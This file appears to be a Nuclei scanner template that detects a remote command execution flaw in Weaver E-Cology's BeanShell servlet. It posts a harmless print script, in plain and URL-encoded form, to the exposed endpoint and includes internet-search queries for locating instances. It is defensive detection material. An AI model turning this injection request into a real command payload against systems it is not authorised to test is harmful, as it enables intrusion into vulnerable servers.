id: weaver-ecology-bshservlet-rce info: name: Weaver E-Cology BeanShell - Remote Command Execution author: SleepingBag945 severity: critical description: | Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. metadata: verified: true max-request: 2 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" product: e-cology vendor: weaver tags: beanshell,rce,weaver classification: cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - raw: - | POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded bsh.script=print%28%22{{randstr}}%22%29%3B - | POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b matchers-condition: and matchers: - type: regex regex: - "BeanShell Test Servlet" - "(?i)
(\n.*){{randstr}}"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100c9ba653f57e01fe93046cf98f3051f013ebdb7d92c0cd2869712af7437fab42b0220290358ee34352b5b70ca770c5531a3deff20a4c8a1c43b569b14a46cbfb7517b:922c64590222798bb761d5b6d8e72950